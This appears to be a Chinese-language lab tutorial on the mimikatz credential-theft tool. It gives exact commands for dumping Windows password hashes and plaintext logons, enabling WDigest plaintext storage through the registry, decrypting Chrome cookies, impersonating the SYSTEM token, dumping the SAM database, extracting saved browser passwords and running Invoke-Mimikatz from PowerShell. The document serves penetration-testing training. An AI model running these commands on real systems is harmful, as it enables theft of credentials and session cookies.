mimikatz猕猴桃工具使用教程
實驗目標:
? 1.使用mimikatz提取chrome中保存的cookie2.使用mimikatz的token模塊中的命令列出token,模仿system用戶token,最后恢復到原來的token3.使用webbrowserpassview和Get-ChromeCreds.ps1獲取chrome保存的密碼實驗步驟:
1. mimikatz基本使用
以管理員運行后,可以隨機打一些字符,進入如下界面
輸入aaa::aaa,可展示所有模塊:
可采用log命令,保存日志
2. 獲取hash與明文用戶口令
privilege::debug sekurlsa::logonPasswords從 Windows 8.1 和 Windows Server 2012 R2 開始,LM 哈希和“純文本”密碼將不在內存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997 補丁。
這里只抓取到了NTLM
嘗試破解1-CMD5
嘗試破解2-ophcrack https://www.objectif-securite.ch/ophcrack.php
修改注冊表,啟用摘要密碼支持
需要創建UseLogonCredential,并賦值為1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)重新登錄后,再次運行
3. 使用mimikatz提取chrome中保存的cookie
首先把chrome保存cookie的文件拷貝到桌面上方便操作,這個文件在 C:\users\360sec\appdata\local\google\chrome\user data\default\cookies 命令行下拷貝的命令是: Copy 'C:\users\360sec\appdata\local\google\chrome\user data\default\cookies ' c:\users\360sec\desktop
打開桌面上的mimikatz_trunk文件夾,進入x64文件夾,打開mimikatz.exe
輸入dpapi::chrome /in:c:\users\360sec\desktop\cookies /unprotect提取cookie
4. 使用mimikatz的token模塊中的命令列出token,模仿system用戶token,最后恢復到原來的token
進入mimikatz文件夾,右鍵mimikatz.exe,選擇以管理員身份運行
使用privilege::debug獲取debug權限
使用token::elevate模仿system用戶的令牌
使用token::list列出令牌
使用 lsadump::sam來獲取sam數據庫中的密碼
使用token::revert恢復令牌
5. 使用webbrowserpassview獲取chrome保存的密碼
打開桌面上的webbrowserpassview文件夾
打開webbrowserpassview.exe
6. 使用Powershell版Mimikatz
一句話執行
powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'總結
以上是生活随笔為你收集整理的mimikatz猕猴桃工具使用教程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 通信达交易接口是什么?
- 下一篇: 2021年中国羊肉市场供需现状、进出口贸